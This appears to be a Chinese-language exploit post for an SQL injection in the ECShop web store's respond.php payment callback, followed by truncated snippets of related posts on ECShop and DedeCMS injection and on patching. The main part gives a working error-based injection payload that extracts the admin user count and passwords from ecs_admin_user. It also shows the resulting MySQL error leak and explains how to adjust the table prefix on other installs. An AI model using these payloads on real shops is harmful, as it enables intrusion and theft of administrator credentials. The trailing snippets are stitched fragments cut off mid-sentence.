原exp為
****************************************==
respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select
(select (select concat(0x7e,0x27,count(*),0x27,0x7e) from `ecs`.ecs_admin_user)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and 1=1
****************************************==
改進方案 成功得到的返回使用者和密碼欄位的exp
暴使用者名稱:
暴密碼:
如果表字首被改如下所示:
****************************************==
mysql server error report:array ( [0] => array ( [message] => mysql query error ) [1] => array ( [sql] => select log_id from `aimeili`.`aml_pay_log` where order_id=1 and(select 1 from(select count(*),concat((select (select (select password from ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 and order_type=1 ) [2] => array ( [error] => table 'aimeili.ecs_admin_user' doesn't exist ) [3] => array ( [errno] => 1146 ) )
****************************************==
只要修改ecs_admin_user為aml_admin_user即可
ecshop 注入漏洞 利用方法 EXP
注入 購物車中一定需要有物品!登陸目標 註冊,選任意一件商品加入到購物車,然後結算,將下面的 儲存為html就可以注入了 效果如下 ropin 補充一下,如果使用不成功,注意看報錯語句 mysql server error report array 0 array message mysql que...
DedeCMS 支付頁面注入漏洞
影響版本 dodecms.官方 漏洞型別 sql注入 漏洞描述 dedecms.織夢buy action.php存在注入,可利用sql查詢 爆管理員使用者密碼。漏洞測試 爆管理帳號 member buy action.php?product member pid 1 20and 201 11 20u...
關於ECSHOP中sql注入漏洞修復
公司部署了乙個ecshop 用於做網上 使用,部署在阿里雲伺服器上,第二天收到阿里雲控制台發來的告警資訊,發現ecshop 目錄下檔案sql注入漏洞以及程式漏洞 如下圖 與技術溝通未果的情況下,網上查了點資料,對其檔案進行修復,如下修改 1,admin shopinfo.php修復方法 大概在第53...